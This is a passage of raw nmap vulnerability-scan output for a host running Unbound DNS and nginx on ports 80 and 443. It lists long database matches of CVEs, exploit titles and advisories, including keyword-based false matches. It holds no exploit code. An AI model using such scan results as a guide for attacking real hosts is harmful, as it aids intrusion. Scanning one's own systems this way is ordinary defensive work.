Generation Process Lets Remote Users Deny Service [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies OSVDB - http://www.osvdb.org: [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure [70873] OpenSSH Legacy Certificates Stack Memory Disclosure [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation [56921] OpenSSH Unspecified Remote Compromise [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution [43745] OpenSSH X11 Forwarding Local Session Hijacking [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection [37315] pam_usb OpenSSH Authentication Unspecified Issue [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS [34601] OPIE w/ OpenSSH Account Enumeration [34600] OpenSSH S/KEY Authentication Account Enumeration [32721] OpenSSH Username Password Complexity Account Enumeration [30232] OpenSSH Privilege Separation Monitor Weakness [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution [29152] OpenSSH Identical Block Packet DoS [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS [22692] OpenSSH scp Command Line Filename Processing Command Injection [20216] OpenSSH with KerberosV Remote Authentication Bypass [19142] OpenSSH Multiple X11 Channel Forwarding Leaks [19141] OpenSSH GSSAPIAuthentication Credential Escalation [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass [16567] OpenSSH Privilege Separation LoginGraceTime DoS [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness [9550] OpenSSH scp Traversal Arbitrary File Overwrite [6601] OpenSSH *realloc() Unspecified Memory Errors [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow [6073] OpenSSH on FreeBSD libutil Arbitrary File Read [6072] OpenSSH PAM Conversation Function Stack Modification [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass [5408] OpenSSH echo simulation Information Disclosure [5113] OpenSSH NIS YP Netgroups Authentication Bypass [4536] OpenSSH Portable AIX linker Privilege Escalation [3938] OpenSSL and OpenSSH /dev/random Check Failure [3456] OpenSSH buffer_append_space() Heap Corruption [2557] OpenSSH Multiple Buffer Management Multiple Overflows [2140] OpenSSH w/ PAM Username Validity Timing Attack [2112] OpenSSH Reverse DNS Lookup Bypass [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness [1853] OpenSSH Symbolic Link 'cookies' File Removal [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow [730] OpenSSH Channel Code Off by One Remote Privilege Escalation [688] OpenSSH UseLogin Environment Variable Local Command Execution [642] OpenSSH Multiple Key Type ACL Bypass [504] OpenSSH SSHv2 Public Key Authentication Bypass [341] OpenSSH UseLogin Local Privilege Escalation
53	tcp	open	domain	syn-ack	Unbound
	vulscan	VulDB - https://vuldb.com: [114712] UnboundID LDAP SDK Access Control SimpleBindRequest privilege escalation [68440] FreeBSD 10.0/10.1 Unbound iterator.c denial of service MITRE CVE - https://cve.mitre.org: [CVE-2012-1192] The resolver in Unbound before 1.4.11 overwrites cached server names and TTL values in NS records during the processing of a response to an A record query, which allows remote attackers to trigger continued resolvability of revoked domain names via a "ghost domain names" attack. [CVE-2011-4869] validator/val_nsec3.c in Unbound before 1.4.13p2 does not properly perform proof processing for NSEC3-signed zones, which allows remote DNS servers to cause a denial of service (daemon crash) via a malformed response that lacks expected NSEC3 records, a different vulnerability than CVE-2011-4528. [CVE-2011-4528] Unbound before 1.4.13p2 attempts to free unallocated memory during processing of duplicate CNAME records in a signed zone, which allows remote DNS servers to cause a denial of service (daemon crash) via a crafted response. [CVE-2011-1922] daemon/worker.c in Unbound 1.x before 1.4.10, when debugging functionality and the interface-automatic option are enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted DNS request that triggers improper error handling. [CVE-2010-0969] Unbound before 1.4.3 does not properly align structures on 64-bit platforms, which allows remote attackers to cause a denial of service (daemon crash) via unspecified vectors. [CVE-2009-4008] Unbound before 1.4.4 does not send responses for signed zones after mishandling an unspecified query, which allows remote attackers to cause a denial of service (DNSSEC outage) via a crafted query. [CVE-2009-3602] Unbound before 1.3.4 does not properly verify signatures for NSEC3 records, which allows remote attackers to cause secure delegations to be downgraded via DNS spoofing or other DNS-related attacks in conjunction with crafted delegation responses. [CVE-2006-5336] Multiple unspecified vulnerabilities in the Change Data Capture (CDC) component in Oracle Database 9.2.0.7, 10.1.0.5, and have unknown impact and remote authenticated attack vectors related to (1) sys.dbms_cdc_ipublish (Vuln# DB05) and (2) sys.dbms_cdc_isubscribe (DB06). NOTE: as of 20061023, Oracle has not disputed reports from reliable third parties that DB05 is for SQL injection in CREATE_CHANGE_TABLE and CHANGE_TABLE_TRIGGER, and DB06 is for PL/SQL injection in the PREPARE_UNBOUNDED_VIEW procedure. [CVE-2004-0891] Buffer overflow in the MSN protocol handler for gaim 0.79 to 1.0.1 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via an "unexpected sequence of MSNSLP messages" that results in an unbounded copy operation that writes to the wrong buffer. SecurityFocus - https://www.securityfocus.com/bid/: [103458] UnboundID LDAP SDK for Java CVE-2018-1000134 Authentication Bypass Vulnerability [102817] Unbound CVE-2017-15105 Security Bypass Vulnerability [78263] Unbound CVE-2012-1192 Remote Security Vulnerability [71589] Unbound CVE-2014-8602 Remote Denial of Service Vulnerability [51115] Unbound Multiple Denial of Service Vulnerabilities [48209] Unbound DNSSEC Remote Denial of Service Vulnerability [47986] Unbound DNS Resolver Remote Denial of Service Vulnerability [38701] Unbound 'sock_list' Structure Allocation Remote Denial Of Service Vulnerability [37459] Unbound DNS Server NSEC3 Signature Verification DNS Spoofing Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [73358] Unbound resolver security bypass [71868] Unbound NSEC3 denial of service [71867] Unbound RR denial of service [67863] Unbound signed zones denial of service [67645] Unbound DNS denial of service [56894] Unbound sock_list denial of service [53729] Unbound NSEC3 security bypass [30100] Oracle Database PREPARE_UNBOUNDED_VIEW SQL injection Exploit-DB - https://www.exploit-db.com: No findings OpenVAS (Nessus) - http://www.openvas.org: [863937] Fedora Update for unbound FEDORA-2011-17282 [863673] Fedora Update for unbound FEDORA-2011-17337 [863235] Fedora Update for unbound FEDORA-2011-7555 [103370] Unbound Multiple Denial of Service Vulnerabilities [103170] Unbound DNS Resolver Remote Denial of Service Vulnerability [100531] Unbound 'sock_list' Structure Allocation Remote Denial Of Service Vulnerability [100417] Unbound DNS resolver Detection [100416] Unbound DNS Server NSEC3 Signature Verification DNS Spoofing Vulnerability [70775] Gentoo Security Advisory GLSA 201110-12 (unbound) [70689] Debian Security Advisory DSA 2370-1 (unbound) [70589] FreeBSD Ports: unbound [69758] FreeBSD Ports: unbound [69741] Debian Security Advisory DSA 2243-1 (unbound) [66597] Debian Security Advisory DSA 1963-1 (unbound) SecurityTracker - https://www.securitytracker.com: No findings OSVDB - http://www.osvdb.org: [79441] Unbound Cache Update Policy Deleted Domain Name Resolving Weakness [78807] Apple Mac OS X CoreUI Component Unbounded Stack Allocation URL Handling Remote Code Execution [77910] Unbound NSEC3-Signed Zones Response Parsing Remote DoS [77909] Unbound Duplicate Resource Record Parsing Remote DoS [73253] Unbound Signed Zone Query Response DNSSEC Outage Remote DoS [72750] Unbound daemon/worker.c DNS Request Error Handling Remote DoS [62903] Unbound on 64-bit Memory Alignment Remote DoS [58836] Unbound NSEC3 Record Signature Check Validation Bypass
80	tcp	open	http	syn-ack	nginx
	http-stored-xss	Couldn't find any stored XSS vulnerabilities.
	http-dombased-xss	Couldn't find any DOM based XSS.
	http-csrf	Couldn't find any CSRF vulnerabilities.
	http-vuln-cve2013-7091	ERROR: Script execution failed (use -d to debug)
	vulscan	VulDB - https://vuldb.com: [176405] Nginx up to 1.13.5 Autoindex Module integer overflow [176114] Nginx Controller up to 3.6.x Agent Configuration File agent.conf permission [176113] Nginx Controller up to 3.9.x NAAS API Key Generation random values [176112] Nginx Controller up to 2.8.x/3.14.x systemd.txt insertion of sensitive information into sent data [176111] Nginx Controller up to 3.3.x Intra-Cluster Communication cleartext transmission [176110] Nginx Open Source/Plus/Ingress Controller Resolver off-by-one [171030] ExpressVPN Router 1 Nginx Webserver integer overflow [160163] Cloud Foundry Routing Nginx denial of service [159138] Kubernetes up to 0.27.x ingress-nginx privilege escalation [157631] Nginx Controller up to 1.0.1/2.8.x/3.4.x Kubernetes Package Download HTTP weak encryption [157630] Nginx Controller up to 1.0.1/2.8.x/3.4.x NATS Messaging System weak authentication [157629] Nginx Controller up to 1.0.1/2.8.x/3.4.x User Interface weak authentication [157572] Nginx Controller up to 3.4.0 API Endpoint Reflected cross site scripting [157571] Nginx Controller up to 1.0.1/2.9.0/3.4.0 User Interface cross site request forgery [155282] nginx up to 1.18.0 privilege escalation [154857] Nginx Controller up to 3.3.0 Web Server Logout weak authentication [154326] Nginx Controller up to 3.2.x Agent Installer Script install.sh privilege escalation [154324] Nginx Controller up to 3.2.x Postgres Database Server information disclosure [154323] Nginx Controller up to 3.1.x TLS weak authentication [152728] strong-nginx-controller up to 1.0.2 _nginxCmd privilege escalation [152416] Nginx Controller up to 3.1.x Controller API privilege escalation [148519] nginx up to 1.17.6 Error Page privilege escalation [145942] nginx 0.8.40 HTTP Proxy Module privilege escalation [144114] Xiaomi Mi WiFi R3G up to 2.28.22 Nginx Alias account directory traversal [133852] Sangfor Sundray WLAN Controller up to 3.7.4.2 Cookie Header nginx_webconsole.php privilege escalation [132132] SoftNAS Cloud 4.2.0/4.2.1 Nginx privilege escalation [131858] Puppet Discovery up to 1.3.x Nginx Container weak authentication [130644] Nginx Unit up to 1.7.0 Router Process memory corruption [127759] VeryNginx 0.3.3 Web Application Firewall 7PK Security Features [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module information disclosure [126524] nginx up to 1.14.0/1.15.5 HTTP2 denial of service [126523] nginx up to 1.14.0/1.15.5 HTTP2 denial of service [103517] nginx up to 1.13.2 Range Filter memory corruption [89849] nginx RFC 3875 Namespace Conflict privilege escalation [87719] nginx up to 1.11.0 ngx_files.c ngx_chain_to_iovec denial of service [80760] nginx 0.6.18/1.9.9 DNS CNAME Record denial of service [80759] nginx 0.6.18/1.9.9 DNS CNAME Record memory corruption [80758] nginx 0.6.18/1.9.9 DNS UDP Packet denial of service [65364] nginx up to 1.1.13 Default Configuration privilege escalation [61434] nginx 1.2.0/1.3.0 on Windows Access Restriction privilege escalation [59645] nginx up to 0.8.9 memory corruption [53592] nginx 0.8.36 privilege escalation [53590] nginx up to 0.8.9 information disclosure [51533] nginx 0.7.64 Terminal privilege escalation [50905] nginx up to 0.8.9 directory traversal [50903] nginx up to 0.8.10 memory corruption [50043] nginx up to 0.8.10 memory corruption [67677] nginx up to 1.7.3 SSL privilege escalation [67296] nginx up to 1.7.3 SMTP Proxy ngx_mail_smtp_starttls privilege escalation [12824] nginx 1.5.10 on 32-bit SPDY memory corruption [12822] nginx up to 1.5.11 SPDY memory corruption [11237] nginx up to 1.5.6 URI String privilege escalation [8671] nginx up to 1.4 proxy_pass privilege escalation [8618] nginx 1.3.9/1.4.0 http/ngx_http_parse.c ngx_http_parse_chunked Numeric Error [7247] nginx 1.2.6 Proxy Function weak authentication [5293] nginx up to 1.1.18 ngx_http_mp4_module memory corruption [4843] nginx up to 1.0.13/1.1.16 HTTP Header Response Parser ngx_http_parse.c denial of service MITRE CVE - https://cve.mitre.org: [CVE-2013-2070] http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028. [CVE-2013-2028] The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow. [CVE-2012-3380] Directory traversal vulnerability in naxsi-ui/nx_extract.py in the Naxsi module before 0.46-1 for Nginx allows local users to read arbitrary files via unspecified vectors. [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file. [CVE-2012-1180] Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request. [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request. [CVE-2011-4315] Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response. [CVE-2010-2266] nginx 0.8.36 allows remote attackers to cause a denial of service (crash) via certain encoded directory traversal sequences that trigger memory corruption, as demonstrated using the "%c0.%c0." sequence. [CVE-2010-2263] nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI. [CVE-2009-4487] nginx 0.7.64 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator. [CVE-2009-3898] Directory traversal vulnerability in src/http/modules/ngx_http_dav_module.c in nginx (aka Engine X) before 0.7.63, and 0.8.x before 0.8.17, allows remote authenticated users to create or overwrite arbitrary files via a .. (dot dot) in the Destination HTTP header for the WebDAV (1) COPY or (2) MOVE method. [CVE-2009-3896] src/http/ngx_http_parse.c in nginx (aka Engine X) 0.1.0 through 0.4.14, 0.5.x before 0.5.38, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.14 allows remote attackers to cause a denial of service (NULL pointer dereference and worker process crash) via a long URI. [CVE-2009-2629] Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests. SecurityFocus - https://www.securityfocus.com/bid/: [99534] Nginx CVE-2017-7529 Remote Integer Overflow Vulnerability [93903] Nginx CVE-2016-1247 Remote Privilege Escalation Vulnerability [91819] Nginx CVE-2016-1000105 Security Bypass Vulnerability [90967] nginx CVE-2016-4450 Denial of Service Vulnerability [82230] nginx Multiple Denial of Service Vulnerabilities [78928] Nginx CVE-2010-2266 Denial-Of-Service Vulnerability [70025] nginx CVE-2014-3616 SSL Session Fixation Vulnerability [69111] nginx SMTP Proxy Remote Command Injection Vulnerability [67507] nginx SPDY Implementation CVE-2014-0088 Arbitrary Code Execution Vulnerability [66537] nginx SPDY Implementation Heap Based Buffer Overflow Vulnerability [63814] nginx CVE-2013-4547 URI Processing Security Bypass Vulnerability [59824] Nginx CVE-2013-2070 Remote Security Vulnerability [59699] nginx 'ngx_http_parse.c' Stack Buffer Overflow Vulnerability [59496] nginx 'ngx_http_close_connection()' Remote Integer Overflow Vulnerability [59323] nginx NULL-Byte Arbitrary Code Execution Vulnerability [58105] Nginx 'access.log' Insecure File Permissions Vulnerability [57139] nginx CVE-2011-4968 Man in The Middle Vulnerability [55920] nginx CVE-2011-4963 Security Bypass Vulnerability [54331] Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability [52999] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability [52578] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability [50710] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability [40760] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities [40434] nginx Space String Remote Source Code Disclosure Vulnerability [40420] nginx Directory Traversal Vulnerability [37711] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability [36839] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities [36438] nginx Proxy DNS Cache Domain Spoofing Vulnerability [36384] nginx HTTP Request Remote Buffer Overflow Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [84623] Phusion Passenger gem for Ruby with nginx configuration insecure permissions [84172] nginx denial of service [84048] nginx buffer overflow [83923] nginx ngx_http_close_connection() integer overflow [83688] nginx null byte code execution [83103] Naxsi module for Nginx naxsi_unescape_uri() function security bypass [82319] nginx access.log information disclosure [80952] nginx SSL spoofing [77244] nginx and Microsoft Windows request security bypass [76778] Naxsi module for Nginx nx_extract.py directory traversal [74831] nginx ngx_http_mp4_module.c buffer overflow [74191] nginx ngx_cpystrn() information disclosure [74045] nginx header response information disclosure [71355] nginx ngx_resolver_copy() buffer overflow [59370] nginx characters denial of service [59369] nginx DATA source code disclosure [59047] nginx space source code disclosure [58966] nginx unspecified directory traversal [54025] nginx ngx_http_parse.c denial of service [53431] nginx WebDAV component directory traversal [53328] Nginx CRC-32 cached domain name spoofing [53250] Nginx ngx_http_parse_complex_uri() function code execution Exploit-DB - https://www.exploit-db.com: [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow [25499] nginx 1.3.9-1.4.0 DoS PoC [24967] nginx 0.6.x Arbitrary Code Execution NullByte Injection [14830] nginx 0.6.38 - Heap Corruption Exploit [13822] Nginx <= 0.7.65 / 0.8.39 (dev) Source Disclosure / Download Vulnerability [13818] Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities [12804] nginx [engine x] http server <= 0.6.36 Path Draversal [9901] nginx 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14 PoC [9829] nginx 0.7.61 WebDAV directory traversal OpenVAS (Nessus) - http://www.openvas.org: [864418] Fedora Update for nginx FEDORA-2012-3846 [864310] Fedora Update for nginx FEDORA-2012-6238 [864209] Fedora Update for nginx FEDORA-2012-6411 [864204] Fedora Update for nginx FEDORA-2012-6371 [864121] Fedora Update for nginx FEDORA-2012-4006 [864115] Fedora Update for nginx FEDORA-2012-3991 [864065] Fedora Update for nginx FEDORA-2011-16075 [863654] Fedora Update for nginx FEDORA-2011-16110 [861232] Fedora Update for nginx FEDORA-2007-1158 [850180] SuSE Update for nginx openSUSE-SU-2012:0237-1 (nginx) [831680] Mandriva Update for nginx MDVSA-2012:043 (nginx) [802045] 64-bit Debian Linux Rootkit with nginx Doing iFrame Injection [801636] nginx HTTP Request Remote Buffer Overflow Vulnerability [103470] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability [103469] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability [103344] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability [100676] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities [100659] nginx Directory Traversal Vulnerability [100658] nginx Space String Remote Source Code Disclosure Vulnerability [100441] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability [100321] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability [100277] nginx Proxy DNS Cache Domain Spoofing Vulnerability [100276] nginx HTTP Request Remote Buffer Overflow Vulnerability [100275] nginx WebDAV Multiple Directory Traversal Vulnerabilities [71574] Gentoo Security Advisory GLSA 201206-07 (nginx) [71308] Gentoo Security Advisory GLSA 201203-22 (nginx) [71297] FreeBSD Ports: nginx [71276] FreeBSD Ports: nginx [71239] Debian Security Advisory DSA 2434-1 (nginx) [66451] Fedora Core 11 FEDORA-2009-12782 (nginx) [66450] Fedora Core 10 FEDORA-2009-12775 (nginx) [66449] Fedora Core 12 FEDORA-2009-12750 (nginx) [64924] Gentoo Security Advisory GLSA 200909-18 (nginx) [64912] Fedora Core 10 FEDORA-2009-9652 (nginx) [64911] Fedora Core 11 FEDORA-2009-9630 (nginx) [64894] FreeBSD Ports: nginx [64869] Debian Security Advisory DSA 1884-1 (nginx) SecurityTracker - https://www.securitytracker.com: [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents OSVDB - http://www.osvdb.org: [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow [92796] nginx ngx_http_close_connection Function Crafted r-&gt [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution [90518] nginx Log Directory Permission Weakness Local Information Disclosure [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow [80124] nginx HTTP Header Response Parsing Freed Memory Information Disclosure [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS [65294] nginx on Windows Encoded Space Request Remote Source Disclosure [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [62617] nginx Internal DNS Cache Poisoning Weakness [61779] nginx HTTP Request Escape Sequence Terminal Command Injection [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write [58128] nginx ngx_http_parse_complex_uri() Function Underflow [44447] nginx (engine x) msie_refresh Directive Unspecified XSS [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal [44443] nginx (engine x) rtsig Method Signal Queue Overflow [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow
	http-passwd	ERROR: Script execution failed (use -d to debug)
443	tcp	open	http	syn-ack	nginx
	http-csrf	Couldn't find any CSRF vulnerabilities.
	http-fileupload-exploiter	Couldn't find a file-type field.
	http-dombased-xss	Couldn't find any DOM based XSS.
	http-enum	/manifest.json: Manifest JSON File
	http-stored-xss	Couldn't find any stored XSS vulnerabilities.
	vulscan	VulDB - https://vuldb.com: [176405] Nginx up to 1.13.5 Autoindex Module integer overflow [176114] Nginx Controller up to 3.6.x Agent Configuration File agent.conf permission [176113] Nginx Controller up to 3.9.x NAAS API Key Generation random values [176112] Nginx Controller up to 2.8.x/3.14.x systemd.txt insertion of sensitive information into sent data [176111] Nginx Controller up to 3.3.x Intra-Cluster Communication cleartext transmission [176110] Nginx Open Source/Plus/Ingress Controller Resolver off-by-one [171030] ExpressVPN Router 1 Nginx Webserver integer overflow [160163] Cloud Foundry Routing Nginx denial of service [159138] Kubernetes up to 0.27.x ingress-nginx privilege escalation [157631] Nginx Controller up to 1.0.1/2.8.x/3.4.x Kubernetes Package Download HTTP weak encryption [157630] Nginx Controller up to 1.0.1/2.8.x/3.4.x NATS Messaging System weak authentication [157629] Nginx Controller up to 1.0.1/2.8.x/3.4.x User Interface weak authentication [157572] Nginx Controller up to 3.4.0 API Endpoint Reflected cross site scripting [157571] Nginx Controller up to 1.0.1/2.9.0/3.4.0 User Interface cross site request forgery [155282] nginx up to 1.18.0 privilege escalation [154857] Nginx Controller up to 3.3.0 Web Server Logout weak authentication [154326] Nginx Controller up to 3.2.x Agent Installer Script install.sh privilege escalation [154324] Nginx Controller up to 3.2.x Postgres Database Server information disclosure [154323] Nginx Controller up to 3.1.x TLS weak authentication [152728] strong-nginx-controller up to 1.0.2 _nginxCmd privilege escalation [152416] Nginx Controller up to 3.1.x Controller API privilege escalation [148519] nginx up to 1.17.6 Error Page privilege escalation [145942] nginx 0.8.40 HTTP Proxy Module privilege escalation [144114] Xiaomi Mi WiFi R3G up to 2.28.22 Nginx Alias account directory traversal [133852] Sangfor Sundray WLAN Controller up to 3.7.4.2 Cookie Header nginx_webconsole.php privilege escalation [132132] SoftNAS Cloud 4.2.0/4.2.1 Nginx privilege escalation [131858] Puppet Discovery up to 1.3.x Nginx Container weak authentication [130644] Nginx Unit up to 1.7.0 Router Process memory corruption [127759] VeryNginx 0.3.3 Web Application Firewall 7PK Security Features [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module information disclosure [126524] nginx up to 1.14.0/1.15.5 HTTP2 denial of service [126523] nginx up to 1.14.0/1.15.5 HTTP2 denial of service [103517] nginx up to 1.13.2 Range Filter memory corruption [89849] nginx RFC 3875 Namespace Conflict privilege escalation [87719] nginx up to 1.11.0 ngx_files.c ngx_chain_to_iovec denial of service [80760] nginx 0.6.18/1.9.9 DNS CNAME Record denial of service [80759] nginx 0.6.18/1.9.9 DNS CNAME Record memory corruption [80758] nginx 0.6.18/1.9.9 DNS UDP Packet denial of service [65364] nginx up to 1.1.13 Default Configuration privilege escalation [61434] nginx 1.2.0/1.3.0 on Windows Access 